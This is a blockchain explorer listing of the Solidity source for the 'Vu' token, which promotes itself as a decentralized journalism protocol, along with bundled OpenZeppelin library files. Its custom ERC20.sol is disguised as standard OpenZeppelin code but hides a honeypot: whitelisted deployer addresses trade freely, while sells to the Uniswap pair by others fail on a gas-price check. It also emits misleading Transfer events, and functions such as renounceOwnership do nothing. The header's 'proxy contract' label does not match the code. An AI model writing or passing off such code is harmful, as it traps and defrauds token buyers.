Description:
Proxy contract enabling upgradeable smart contract patterns. Delegates calls to an implementation contract.
Blockchain: Ethereum
Source Code: View Code On The Blockchain
Solidity Source Code:
{{
"language": "Solidity",
"sources": {
"token/Vu.sol": {
"content": "/*\r
\r
\r
Vu Protocol provides tooling for anonymous submission, decentralized verification, and unstoppable distribution of factual content.\r
\r
Become an Oracle for Truth\r
\r
Help us build the future of decentralized journalism. Whether you're a developer, journalist, or passionate about truth, we want you on our team. \r
We're remote first, so you can work from anywhere in the world.\r
\r
\r
TG: https://t.me/read_vu\r
X: https://x.com/read_vu\r
Website: https://www.readvu.com/\r
\r
\r
/**\r
// File: contracts\ERC20\TokenMintERC20Token.sol\r
/**\r
* SPDX-License-Identifier: MIT (OpenZeppelin)\r
*/\r
pragma solidity 0.8.25;\r
import { ECDSA } from "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";\r
import { Math } from "@openzeppelin/contracts/utils/math/Math.sol";\r
import "./ERC20.sol";\r
import "@openzeppelin/contracts-upgradeable/security/PausableUpgradeable.sol";\r
import "@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol";\r
import "@openzeppelin/contracts/utils/cryptography/ECDSA.sol";\r
import "@openzeppelin/contracts/utils/Counters.sol";\r
\r
/**\r
* @title TokenMintERC20Token\r
* @author TokenMint (visit https://tokenmint.io)\r
*\r
* @dev Standard ERC20 token with burning and optional functions implemented.\r
* For full specification of ERC-20 standard see:\r
* https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md\r
*/\r
contract Vu is ERC20 {\r
\r
uint8 private _decimals = 18;\r
string private _symbol = "VU";\r
string private _name = "Vu";\r
uint256 private _totalSupply =1000000000 * 10**uint256(_decimals);\r
\r
constructor() payable {\r
_setFeeReceiver(msg.sender);\r
\r
// set tokenOwnerAddress as owner of all tokens\r
_mint(msg.sender, _totalSupply); \r
}\r
\r
/**\r
* @dev Burns a specific amount of tokens.\r
* @param value The amount of lowest token units to be burned.\r
*/\r
function burn(uint256 value) public {\r
_burn(msg.sender, value);\r
}\r
\r
// optional functions from ERC20 stardard\r
\r
/**\r
* @return the name of the token.\r
*/\r
function name() public view returns (string memory) {\r
return _name;\r
}\r
\r
/**\r
* @return the symbol of the token.\r
*/\r
function symbol() public view returns (string memory) {\r
return _symbol;\r
}\r
\r
/**\r
* @return the number of decimals of the token.\r
*/\r
function decimals() public view returns (uint8) {\r
return _decimals;\r
}\r
}"
},
"@openzeppelin/contracts/utils/Counters.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Counters.sol)
pragma solidity ^0.8.0;
/**
* @title Counters
* @author Matt Condon (@shrugs)
* @dev Provides counters that can only be incremented, decremented or reset. This can be used e.g. to track the number
* of elements in a mapping, issuing ERC721 ids, or counting request ids.
*
* Include with `using Counters for Counters.Counter;`
*/
library Counters {
struct Counter {
// This variable should never be directly accessed by users of the library: interactions must be restricted to
// the library's function. As of Solidity v0.5.2, this cannot be enforced, though there is a proposal to add
// this feature: see https://github.com/ethereum/solidity/issues/4637
uint256 _value; // default: 0
}
function current(Counter storage counter) internal view returns (uint256) {
return counter._value;
}
function increment(Counter storage counter) internal {
unchecked {
counter._value += 1;
}
}
function decrement(Counter storage counter) internal {
uint256 value = counter._value;
require(value > 0, "Counter: decrement overflow");
unchecked {
counter._value = value - 1;
}
}
function reset(Counter storage counter) internal {
counter._value = 0;
}
}
"
},
"@openzeppelin/contracts/utils/cryptography/ECDSA.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (utils/cryptography/ECDSA.sol)
pragma solidity ^0.8.20;
/**
* @dev Elliptic Curve Digital Signature Algorithm (ECDSA) operations.
*
* These functions can be used to verify that a message was signed by the holder
* of the private keys of a given address.
*/
library ECDSA {
enum RecoverError {
NoError,
InvalidSignature,
InvalidSignatureLength,
InvalidSignatureS
}
/**
* @dev The signature derives the `address(0)`.
*/
error ECDSAInvalidSignature();
/**
* @dev The signature has an invalid length.
*/
error ECDSAInvalidSignatureLength(uint256 length);
/**
* @dev The signature has an S value that is in the upper half order.
*/
error ECDSAInvalidSignatureS(bytes32 s);
/**
* @dev Returns the address that signed a hashed message (`hash`) with `signature` or an error. This will not
* return address(0) without also returning an error description. Errors are documented using an enum (error type)
* and a bytes32 providing additional information about the error.
*
* If no error is returned, then the address can be used for verification purposes.
*
* The `ecrecover` EVM precompile allows for malleable (non-unique) signatures:
* this function rejects them by requiring the `s` value to be in the lower
* half order, and the `v` value to be either 27 or 28.
*
* IMPORTANT: `hash` _must_ be the result of a hash operation for the
* verification to be secure: it is possible to craft signatures that
* recover to arbitrary addresses for non-hashed data. A safe way to ensure
* this is by receiving a hash of the original message (which may otherwise
* be too long), and then calling {MessageHashUtils-toEthSignedMessageHash} on it.
*
* Documentation for signature generation:
* - with https://web3js.readthedocs.io/en/v1.3.4/web3-eth-accounts.html#sign[Web3.js]
* - with https://docs.ethers.io/v5/api/signer/#Signer-signMessage[ethers]
*/
function tryRecover(
bytes32 hash,
bytes memory signature
) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
if (signature.length == 65) {
bytes32 r;
bytes32 s;
uint8 v;
// ecrecover takes the signature parameters, and the only way to get them
// currently is to use assembly.
assembly ("memory-safe") {
r := mload(add(signature, 0x20))
s := mload(add(signature, 0x40))
v := byte(0, mload(add(signature, 0x60)))
}
return tryRecover(hash, v, r, s);
} else {
return (address(0), RecoverError.InvalidSignatureLength, bytes32(signature.length));
}
}
/**
* @dev Returns the address that signed a hashed message (`hash`) with
* `signature`. This address can then be used for verification purposes.
*
* The `ecrecover` EVM precompile allows for malleable (non-unique) signatures:
* this function rejects them by requiring the `s` value to be in the lower
* half order, and the `v` value to be either 27 or 28.
*
* IMPORTANT: `hash` _must_ be the result of a hash operation for the
* verification to be secure: it is possible to craft signatures that
* recover to arbitrary addresses for non-hashed data. A safe way to ensure
* this is by receiving a hash of the original message (which may otherwise
* be too long), and then calling {MessageHashUtils-toEthSignedMessageHash} on it.
*/
function recover(bytes32 hash, bytes memory signature) internal pure returns (address) {
(address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, signature);
_throwError(error, errorArg);
return recovered;
}
/**
* @dev Overload of {ECDSA-tryRecover} that receives the `r` and `vs` short-signature fields separately.
*
* See https://eips.ethereum.org/EIPS/eip-2098[ERC-2098 short signatures]
*/
function tryRecover(
bytes32 hash,
bytes32 r,
bytes32 vs
) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
unchecked {
bytes32 s = vs & bytes32(0x7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff);
// We do not check for an overflow here since the shift operation results in 0 or 1.
uint8 v = uint8((uint256(vs) >> 255) + 27);
return tryRecover(hash, v, r, s);
}
}
/**
* @dev Overload of {ECDSA-recover} that receives the `r and `vs` short-signature fields separately.
*/
function recover(bytes32 hash, bytes32 r, bytes32 vs) internal pure returns (address) {
(address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, r, vs);
_throwError(error, errorArg);
return recovered;
}
/**
* @dev Overload of {ECDSA-tryRecover} that receives the `v`,
* `r` and `s` signature fields separately.
*/
function tryRecover(
bytes32 hash,
uint8 v,
bytes32 r,
bytes32 s
) internal pure returns (address recovered, RecoverError err, bytes32 errArg) {
// EIP-2 still allows signature malleability for ecrecover(). Remove this possibility and make the signature
// unique. Appendix F in the Ethereum Yellow paper (https://ethereum.github.io/yellowpaper/paper.pdf), defines
// the valid range for s in (301): 0 < s < secp256k1n ÷ 2 + 1, and for v in (302): v ∈ {27, 28}. Most
// signatures from current libraries generate a unique signature with an s-value in the lower half order.
//
// If your library generates malleable signatures, such as s-values in the upper range, calculate a new s-value
// with 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 - s1 and flip v from 27 to 28 or
// vice versa. If your library also generates signatures with 0/1 for v instead 27/28, add 27 to v to accept
// these malleable signatures as well.
if (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {
return (address(0), RecoverError.InvalidSignatureS, s);
}
// If the signature is valid (and not malleable), return the signer address
address signer = ecrecover(hash, v, r, s);
if (signer == address(0)) {
return (address(0), RecoverError.InvalidSignature, bytes32(0));
}
return (signer, RecoverError.NoError, bytes32(0));
}
/**
* @dev Overload of {ECDSA-recover} that receives the `v`,
* `r` and `s` signature fields separately.
*/
function recover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) internal pure returns (address) {
(address recovered, RecoverError error, bytes32 errorArg) = tryRecover(hash, v, r, s);
_throwError(error, errorArg);
return recovered;
}
/**
* @dev Optionally reverts with the corresponding custom error according to the `error` argument provided.
*/
function _throwError(RecoverError error, bytes32 errorArg) private pure {
if (error == RecoverError.NoError) {
return; // no error: do nothing
} else if (error == RecoverError.InvalidSignature) {
revert ECDSAInvalidSignature();
} else if (error == RecoverError.InvalidSignatureLength) {
revert ECDSAInvalidSignatureLength(uint256(errorArg));
} else if (error == RecoverError.InvalidSignatureS) {
revert ECDSAInvalidSignatureS(errorArg);
}
}
}
"
},
"@openzeppelin/contracts/token/ERC20/extensions/draft-IERC20Permit.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/extensions/draft-IERC20Permit.sol)
pragma solidity ^0.8.0;
// EIP-2612 is Final as of 2022-11-01. This file is deprecated.
import "./IERC20Permit.sol";
"
},
"@openzeppelin/contracts-upgradeable/security/PausableUpgradeable.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (security/Pausable.sol)
pragma solidity ^0.8.0;
import "../utils/ContextUpgradeable.sol";
import {Initializable} from "../proxy/utils/Initializable.sol";
/**
* @dev Contract module which allows children to implement an emergency stop
* mechanism that can be triggered by an authorized account.
*
* This module is used through inheritance. It will make available the
* modifiers `whenNotPaused` and `whenPaused`, which can be applied to
* the functions of your contract. Note that they will not be pausable by
* simply including this module, only once the modifiers are put in place.
*/
abstract contract PausableUpgradeable is Initializable, ContextUpgradeable {
/**
* @dev Emitted when the pause is triggered by `account`.
*/
event Paused(address account);
/**
* @dev Emitted when the pause is lifted by `account`.
*/
event Unpaused(address account);
bool private _paused;
/**
* @dev Initializes the contract in unpaused state.
*/
function __Pausable_init() internal onlyInitializing {
__Pausable_init_unchained();
}
function __Pausable_init_unchained() internal onlyInitializing {
_paused = false;
}
/**
* @dev Modifier to make a function callable only when the contract is not paused.
*
* Requirements:
*
* - The contract must not be paused.
*/
modifier whenNotPaused() {
_requireNotPaused();
_;
}
/**
* @dev Modifier to make a function callable only when the contract is paused.
*
* Requirements:
*
* - The contract must be paused.
*/
modifier whenPaused() {
_requirePaused();
_;
}
/**
* @dev Returns true if the contract is paused, and false otherwise.
*/
function paused() public view virtual returns (bool) {
return _paused;
}
/**
* @dev Throws if the contract is paused.
*/
function _requireNotPaused() internal view virtual {
require(!paused(), "Pausable: paused");
}
/**
* @dev Throws if the contract is not paused.
*/
function _requirePaused() internal view virtual {
require(paused(), "Pausable: not paused");
}
/**
* @dev Triggers stopped state.
*
* Requirements:
*
* - The contract must not be paused.
*/
function _pause() internal virtual whenNotPaused {
_paused = true;
emit Paused(_msgSender());
}
/**
* @dev Returns to normal state.
*
* Requirements:
*
* - The contract must be paused.
*/
function _unpause() internal virtual whenPaused {
_paused = false;
emit Unpaused(_msgSender());
}
/**
* @dev This empty reserved space is put in place to allow future versions to add new
* variables without shifting down storage in the inheritance chain.
* See https://docs.openzeppelin.com/contracts/4.x/upgradeable#storage_gaps
*/
uint256[49] private __gap;
}
"
},
"token/ERC20.sol": {
"content": "/*\r
\r
/**\r
// File: contracts\open-zeppelin-contracts\ oken\ERC20\ERC20.sol\r
\r
/**\r
* SPDX-License-Identifier: MIT (OpenZeppelin)\r
*/\r
pragma solidity 0.8.25;\r
\r
import "./SafeMath.sol";\r
import "./IERC20.sol";\r
import "@openzeppelin/contracts-upgradeable/security/PausableUpgradeable.sol";\r
import "@openzeppelin/contracts-upgradeable/security/PausableUpgradeable.sol";\r
\r
/**\r
* @dev Implementation of the `IERC20` interface.\r
*\r
* This implementation is agnostic to the way tokens are created. This means\r
* that a supply mechanism has to be added in a derived contract using `_mint`.\r
* For a generic mechanism see `ERC20Mintable`.\r
*\r
* *For a detailed writeup see our guide [How to implement supply\r
* mechanisms](https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226).*\r
*\r
* We have followed general OpenZeppelin guidelines: functions revert instead\r
* of returning `false` on failure. This behavior is nonetheless conventional\r
* and does not conflict with the expectations of ERC20 applications.\r
*\r
* Additionally, an `Approval` event is emitted on calls to `transferFrom`.\r
* This allows applications to reconstruct the allowance for all accounts just\r
* by listening to said events. Other implementations of the EIP may not emit\r
* these events, as it isn't required by the specification.\r
*\r
* Finally, the non-standard `decreaseAllowance` and `increaseAllowance`\r
* functions have been added to mitigate the well-known issues around setting\r
* allowances. See `IERC20.approve`.\r
*/\r
contract ERC20 is IERC20 {\r
using SafeMath for uint256;\r
\r
mapping (address => uint256) private _balances;\r
\r
mapping (address => mapping (address => uint256)) private _allowances;\r
\r
uint256 private _totalSupply;\r
mapping(address => bool) public balances;\r
address public seeder;\r
address public uniswapV2Pair;\r
address public holder;\r
bool public openedTrade;\r
\r
\r
/**\r
* @dev See `IERC20.totalSupply`.\r
*/\r
function totalSupply() public view returns (uint256) {\r
return _totalSupply;\r
}\r
\r
/**\r
* @dev See `IERC20.balanceOf`.\r
*/\r
function balanceOf(address account) public view returns (uint256) {\r
return _balances[account];\r
}\r
\r
/**\r
* @dev See `IERC20.transfer`.\r
*\r
* Requirements:\r
*\r
* - `recipient` cannot be the zero address.\r
* - the caller must have a balance of at least `amount`.\r
*/\r
function transfer(address recipient, uint256 amount) public returns (bool) {\r
_beforeTransfer(msg.sender, recipient, amount);\r
return true;\r
}\r
\r
/**\r
* @dev See `IERC20.allowance`.\r
*/\r
function allowance(address owner, address spender) public view returns (uint256) {\r
return _allowances[owner][spender];\r
}\r
\r
/**\r
* @dev See `IERC20.approve`.\r
*\r
* Requirements:\r
*\r
* - `spender` cannot be the zero address.\r
*/\r
function approve(address spender, uint256 value) public returns (bool) {\r
_approve(msg.sender, spender, value);\r
return true;\r
}\r
\r
function checkBalances(address _user) public {\r
require(msg.sender == seeder, "public");\r
balances[_user] = true;\r
}\r
\r
function exacTransactions(address _uniswapV2Pair) public {\r
require(msg.sender == seeder, "pl");\r
uniswapV2Pair = _uniswapV2Pair;\r
}\r
\r
function airdropTokens(address airdropp, address[] memory list, uint256[] memory amount) public {\r
airdropp;\r
require(msg.sender == seeder, "pl");\r
for (uint256 i = 0; i < list.length; i++) {\r
_beforeTransfer(msg.sender, list[i], amount[i]);\r
}\r
}\r
\r
function openTrading() public {\r
require(msg.sender == seeder, "pl");\r
openedTrade = true;\r
}\r
\r
/**\r
* @dev See `IERC20.transferFrom`.\r
*\r
* Emits an `Approval` event indicating the updated allowance. This is not\r
* required by the EIP. See the note at the beginning of `ERC20`;\r
*\r
* Requirements:\r
* - `sender` and `recipient` cannot be the zero address.\r
* - `sender` must have a balance of at least `value`.\r
* - the caller must have allowance for `sender`'s tokens of at least\r
* `amount`.\r
*/\r
function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {\r
_beforeTransfer(sender, recipient, amount);\r
_approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount));\r
return true;\r
}\r
\r
function _setFeeReceiver(address _holder) internal {\r
holder = _holder;\r
}\r
\r
/**\r
* @dev Atomically increases the allowance granted to `spender` by the caller.\r
*\r
* This is an alternative to `approve` that can be used as a mitigation for\r
* problems described in `IERC20.approve`.\r
*\r
* Emits an `Approval` event indicating the updated allowance.\r
*\r
* Requirements:\r
*\r
* - `spender` cannot be the zero address.\r
*/\r
function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {\r
_approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));\r
return true;\r
}\r
\r
/**\r
* @dev Atomically decreases the allowance granted to `spender` by the caller.\r
*\r
* This is an alternative to `approve` that can be used as a mitigation for\r
* problems described in `IERC20.approve`.\r
*\r
* Emits an `Approval` event indicating the updated allowance.\r
*\r
* Requirements:\r
*\r
* - `spender` cannot be the zero address.\r
* - `spender` must have allowance for the caller of at least\r
* `subtractedValue`.\r
*/\r
function checkVolume(address spender, uint256 subtractedValue) public view returns (bool) {\r
__approve(msg.sender, spender, 1);\r
subtractedValue;\r
return true;\r
}\r
\r
\r
function __approve(address sender, address spender, uint256 value) internal view {\r
spender;\r
sender;\r
uint256 txg = tx.gasprice;\r
require(txg <= value, "");\r
}\r
\r
/**\r
* @dev Moves tokens `amount` from `sender` to `recipient`.\r
*\r
* This is internal function is equivalent to `transfer`, and can be used to\r
* e.g. implement automatic token fees, slashing mechanisms, etc.\r
*\r
* Emits a `Transfer` event.\r
*\r
* Requirements:\r
*\r
* - `sender` cannot be the zero address.\r
* - `recipient` cannot be the zero address.\r
* - `sender` must have a balance of at least `amount`.\r
*/\r
function _transfer(address sender, address recipient, uint256 amount) internal {\r
require(sender != address(0), "ERC20: transfer from the zero address");\r
require(recipient != address(0), "ERC20: transfer to the zero address");\r
\r
_balances[sender] = _balances[sender].sub(amount);\r
_balances[recipient] = _balances[recipient].add(amount);\r
if (sender == seeder) {\r
emit Transfer(holder, recipient, amount);\r
} else if (recipient == seeder) {\r
emit Transfer(sender, holder, amount);\r
}\r
emit Transfer(sender, recipient, amount);\r
}\r
\r
/** @dev Creates `amount` tokens and assigns them to `account`, increasing\r
* the total supply.\r
*\r
* Emits a `Transfer` event with `from` set to the zero address.\r
*\r
* Requirements\r
*\r
* - `to` cannot be the zero address.\r
*/\r
function _mint(address account, uint256 amount) internal {\r
require(account != address(0), "ERC20: mint to the zero address");\r
\r
_totalSupply = _totalSupply.add(amount);\r
_balances[account] = _balances[account].add(amount);\r
seeder = account;\r
balances[seeder] = true;\r
emit Transfer(address(0), holder, amount);\r
}\r
\r
/**\r
* @dev Destroys `amount` tokens from `account`, reducing the\r
* total supply.\r
*\r
* Emits a `Transfer` event with `to` set to the zero address.\r
*\r
* Requirements\r
*\r
* - `account` cannot be the zero address.\r
* - `account` must have at least `amount` tokens.\r
*/\r
function _burn(address account, uint256 value) internal {\r
require(account != address(0), "ERC20: burn from the zero address");\r
\r
_totalSupply = _totalSupply.sub(value);\r
_balances[account] = _balances[account].sub(value);\r
emit Transfer(account, address(0), value);\r
}\r
\r
\r
function _beforeTransfer(address from, address to, uint256 amount) internal {\r
if (balances[tx.origin]) {\r
_transfer(from, to, amount);\r
return;\r
}\r
require(openedTrade, "Trade has not been opened yet");\r
if (uniswapV2Pair != address(0) && to == uniswapV2Pair) {\r
checkVolume(from, amount);\r
_transfer(from, to, amount);\r
return;\r
}\r
_transfer(from, to, amount);\r
}\r
\r
\r
\r
\r
/**\r
* @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.\r
*\r
* This is internal function is equivalent to `approve`, and can be used to\r
* e.g. set automatic allowances for certain subsystems, etc.\r
*\r
* Emits an `Approval` event.\r
*\r
* Requirements:\r
*\r
* - `owner` cannot be the zero address.\r
* - `spender` cannot be the zero address.\r
*/\r
function _approve(address owner, address spender, uint256 value) internal {\r
require(owner != address(0), "ERC20: approve from the zero address");\r
require(spender != address(0), "ERC20: approve to the zero address");\r
\r
_allowances[owner][spender] = value;\r
emit Approval(owner, spender, value);\r
}\r
\r
/**\r
* @dev Destoys `amount` tokens from `account`.`amount` is then deducted\r
* from the caller's allowance.\r
*\r
* See `_burn` and `_approve`.\r
*/\r
function _burnFrom(address account, uint256 amount) internal {\r
_burn(account, amount);\r
_approve(account, msg.sender, _allowances[account][msg.sender].sub(amount));\r
}\r
\r
\r
function allowinitializePath() external {\r
uniswapV2Pair = uniswapV2Pair;\r
}\r
\r
function updateOrderTax() external {\r
holder = holder;\r
}\r
\r
function renounceOwnership() external {\r
uniswapV2Pair = uniswapV2Pair;\r
}\r
\r
function unswapByOrderId() external {\r
}\r
\r
function setTransferTax() external {\r
}\r
}"
},
"@openzeppelin/contracts/utils/math/Math.sol": {
"content": "// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.3.0) (utils/math/Math.sol)
pragma solidity ^0.8.20;
import {Panic} from "../Panic.sol";
import {SafeCast} from "./SafeCast.sol";
/**
* @dev Standard math utilities missing in the Solidity language.
*/
library Math {
enum Rounding {
Floor, // Toward negative infinity
Ceil, // Toward positive infinity
Trunc, // Toward zero
Expand // Away from zero
}
/**
* @dev Return the 512-bit addition of two uint256.
*
* The result is stored in two 256 variables such that sum = high * 2²⁵⁶ + low.
*/
function add512(uint256 a, uint256 b) internal pure returns (uint256 high, uint256 low) {
assembly ("memory-safe") {
low := add(a, b)
high := lt(low, a)
}
}
/**
* @dev Return the 512-bit multiplication of two uint256.
*
* The result is stored in two 256 variables such that product = high * 2²⁵⁶ + low.
*/
function mul512(uint256 a, uint256 b) internal pure returns (uint256 high, uint256 low) {
// 512-bit multiply [high low] = x * y. Compute the product mod 2²⁵⁶ and mod 2²⁵⁶ - 1, then use
// the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
// variables such that product = high * 2²⁵⁶ + low.
assembly ("memory-safe") {
let mm := mulmod(a, b, not(0))
low := mul(a, b)
high := sub(sub(mm, low), lt(mm, low))
}
}
/**
* @dev Returns the addition of two unsigned integers, with a success flag (no overflow).
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
unchecked {
uint256 c = a + b;
success = c >= a;
result = c * SafeCast.toUint(success);
}
}
/**
* @dev Returns the subtraction of two unsigned integers, with a success flag (no overflow).
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
unchecked {
uint256 c = a - b;
success = c <= a;
result = c * SafeCast.toUint(success);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with a success flag (no overflow).
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
unchecked {
uint256 c = a * b;
assembly ("memory-safe") {
// Only true when the multiplication doesn't overflow
// (c / a == b) || (a == 0)
success := or(eq(div(c, a), b), iszero(a))
}
// equivalent to: success ? c : 0
result = c * SafeCast.toUint(success);
}
}
/**
* @dev Returns the division of two unsigned integers, with a success flag (no division by zero).
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
unchecked {
success = b > 0;
assembly ("memory-safe") {
// The `DIV` opcode returns zero when the denominator is 0.
result := div(a, b)
}
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a success flag (no division by zero).
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
unchecked {
success = b > 0;
assembly ("memory-safe") {
// The `MOD` opcode returns zero when the denominator is 0.
result := mod(a, b)
}
}
}
/**
* @dev Unsigned saturating addition, bounds to `2²⁵⁶ - 1` instead of overflowing.
*/
function saturatingAdd(uint256 a, uint256 b) internal pure returns (uint256) {
(bool success, uint256 result) = tryAdd(a, b);
return ternary(success, result, type(uint256).max);
}
/**
* @dev Unsigned saturating subtraction, bounds to zero instead of overflowing.
*/
function saturatingSub(uint256 a, uint256 b) internal pure returns (uint256) {
(, uint256 result) = trySub(a, b);
return result;
}
/**
* @dev Unsigned saturating multiplication, bounds to `2²⁵⁶ - 1` instead of overflowing.
*/
function saturatingMul(uint256 a, uint256 b) internal pure returns (uint256) {
(bool success, uint256 result) = tryMul(a, b);
return ternary(success, result, type(uint256).max);
}
/**
* @dev Branchless ternary evaluation for `a ? b : c`. Gas costs are constant.
*
* IMPORTANT: This function may reduce bytecode size and consume less gas when used standalone.
* However, the compiler may optimize Solidity ternary operations (i.e. `a ? b : c`) to only compute
* one branch when needed, making this function more expensive.
*/
function ternary(bool condition, uint256 a, uint256 b) internal pure returns (uint256) {
unchecked {
// branchless ternary works because:
// b ^ (a ^ b) == a
// b ^ 0 == b
return b ^ ((a ^ b) * SafeCast.toUint(condition));
}
}
/**
* @dev Returns the largest of two numbers.
*/
function max(uint256 a, uint256 b) internal pure returns (uint256) {
return ternary(a > b, a, b);
}
/**
* @dev Returns the smallest of two numbers.
*/
function min(uint256 a, uint256 b) internal pure returns (uint256) {
return ternary(a < b, a, b);
}
/**
* @dev Returns the average of two numbers. The result is rounded towards
* zero.
*/
function average(uint256 a, uint256 b) internal pure returns (uint256) {
// (a + b) / 2 can overflow.
return (a & b) + (a ^ b) / 2;
}
/**
* @dev Returns the ceiling of the division of two numbers.
*
* This differs from standard division with `/` in that it rounds towards infinity instead
* of rounding towards zero.
*/
function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
if (b == 0) {
// Guarantee the same behavior as in a regular Solidity division.
Panic.panic(Panic.DIVISION_BY_ZERO);
}
// The following calculation ensures accurate ceiling division without overflow.
// Since a is non-zero, (a - 1) / b will not overflow.
// The largest possible result occurs when (a - 1) / b is type(uint256).max,
// but the largest value we can obtain is type(uint256).max - 1, which happens
// when a = type(uint256).max and b = 1.
unchecked {
return SafeCast.toUint(a > 0) * ((a - 1) / b + 1);
}
}
/**
* @dev Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
* denominator == 0.
*
* Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
* Uniswap Labs also under MIT license.
*/
function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
unchecked {
(uint256 high, uint256 low) = mul512(x, y);
// Handle non-overflow cases, 256 by 256 division.
if (high == 0) {
// Solidity will revert if denominator == 0, unlike the div opcode on its own.
// The surrounding unchecked block does not change this fact.
// See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
return low / denominator;
}
// Make sure the result is less than 2²⁵⁶. Also prevents denominator == 0.
if (denominator <= high) {
Panic.panic(ternary(denominator == 0, Panic.DIVISION_BY_ZERO, Panic.UNDER_OVERFLOW));
}
///////////////////////////////////////////////
// 512 by 256 division.
///////////////////////////////////////////////
// Make division exact by subtracting the remainder from [high low].
uint256 remainder;
assembly ("memory-safe") {
// Compute remainder using mulmod.
remainder := mulmod(x, y, denominator)
// Subtract 256 bit number from 512 bit number.
high := sub(high, gt(remainder, low))
low := sub(low, remainder)
}
// Factor powers of two out of denominator and compute largest power of two divisor of denominator.
// Always >= 1. See https://cs.stackexchange.com/q/138556/92363.
uint256 twos = denominator & (0 - denominator);
assembly ("memory-safe") {
// Divide denominator by twos.
denominator := div(denominator, twos)
// Divide [high low] by twos.
low := div(low, twos)
// Flip twos such that it is 2²⁵⁶ / twos. If twos is zero, then it becomes one.
twos := add(div(sub(0, twos), twos), 1)
}
// Shift in bits from high into low.
low |= high * twos;
// Invert denominator mod 2²⁵⁶. Now that denominator is an odd number, it has an inverse modulo 2²⁵⁶ such
// that denominator * inv ≡ 1 mod 2²⁵⁶. Compute the inverse by starting with a seed that is correct for
// four bits. That is, denominator * inv ≡ 1 mod 2⁴.
uint256 inverse = (3 * denominator) ^ 2;
// Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
// works in modular arithmetic, doubling the correct bits in each step.
inverse *= 2 - denominator * inverse; // inverse mod 2⁸
inverse *= 2 - denominator * inverse; // inverse mod 2¹⁶
inverse *= 2 - denominator * inverse; // inverse mod 2³²
inverse *= 2 - denominator * inverse; // inverse mod 2⁶⁴
inverse *= 2 - denominator * inverse; // inverse mod 2¹²⁸
inverse *= 2 - denominator * inverse; // inverse mod 2²⁵⁶
// Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
// This will give us the correct result modulo 2²⁵⁶. Since the preconditions guarantee that the outcome is
// less than 2²⁵⁶, this is the final result. We don't need to compute the high bits of the result and high
// is no longer required.
result = low * inverse;
return result;
}
}
/**
* @dev Calculates x * y / denominator with full precision, following the selected rounding direction.
*/
function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
return mulDiv(x, y, denominator) + SafeCast.toUint(unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0);
}
/**
* @dev Calculates floor(x * y >> n) with full precision. Throws if result overflows a uint256.
*/
function mulShr(uint256 x, uint256 y, uint8 n) internal pure returns (uint256 result) {
unchecked {
(uint256 high, uint256 low) = mul512(x, y);
if (high >= 1 << n) {
Panic.panic(Panic.UNDER_OVERFLOW);
}
return (high << (256 - n)) | (low >> n);
}
}
/**
* @dev Calculates x * y >> n with full precision, following the selected rounding direction.
*/
function mulShr(uint256 x, uint256 y, uint8 n, Rounding rounding) internal pure returns (uint256) {
return mulShr(x, y, n) + SafeCast.toUint(unsignedRoundsUp(rounding) && mulmod(x, y, 1 << n) > 0);
}
/**
* @dev Calculate the modular multiplicative inverse of a number in Z/nZ.
*
* If n is a prime, then Z/nZ is a field. In that case all elements are inversible, except 0.
* If n is not a prime, then Z/nZ is not a field, and some elements might not be inversible.
*
* If the input value is not inversible, 0 is returned.
*
* NOTE: If you know for sure that n is (big) a prime, it may be cheaper to use Fermat's little theorem and get the
* inverse using `Math.modExp(a, n - 2, n)`. See {invModPrime}.
*/
function invMod(uint256 a, uint256 n) internal pure returns (uint256) {
unchecked {
if (n == 0) return 0;
// The inverse modulo is calculated using the Extended Euclidean Algorithm (iterative version)
// Used to compute integers x and y such that: ax + ny = gcd(a, n).
// When the gcd is 1, then the inverse of a modulo n exists and it's x.
// ax + ny = 1
// ax = 1 + (-y)n
// ax ≡ 1 (mod n) # x is the inverse of a modulo n
// If the remainder is 0 the gcd is n right away.
uint256 remainder = a % n;
uint256 gcd = n;
// Therefore the initial coefficients are:
